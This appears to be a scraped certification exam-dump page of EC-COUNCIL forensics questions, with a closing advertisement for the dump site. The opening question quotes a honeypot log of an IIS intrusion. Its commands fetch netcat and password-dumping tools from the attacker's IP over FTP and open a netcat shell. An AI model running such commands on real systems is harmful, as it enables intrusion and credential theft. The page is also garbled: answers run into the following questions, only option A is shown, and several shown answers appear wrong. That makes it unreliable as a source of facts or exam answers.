The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213. 116. 251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in
arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a
malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.
The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213. 116. 251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2kDiskcopy is:
A. a utility by AccessDataGeorge was recently fired from his job as an IT analyst at Pitts and Company in Dallas, Texas. His main duties as an analyst were to support the company's Active Directory structure and to create network policies. George now wants to break into the company network by cracking some of the service accounts he knows about. Which password cracking technique should George use in this situation?
A. Brute force attackWhat will the following command accomplish? dd if=/dev/xxx of=mbr.backup bs=512 count=1
A. Back up the master boot recordHow often must a company keep log files for them to be admissible in a court of law?
A. All log files are admissible in court no matter their frequencyAfter attending a CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the RestrictAnonymous setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session with one of the servers. Why is that?
A. RestrictAnonymous must be set to "10" for complete securityTerri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet?
A. Trick the switch into thinking it already has a session with Terri's computerWhat method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 sever the course of its lifetime?
A. forensic duplication of hard drivePrinting under a Windows Computer normally requires which one of the following files types to be created?
A. EMEWhy should you note all cable connections for a computer you want to seize as evidence?
A. to know what outside connections existedNowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your EC0-349 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.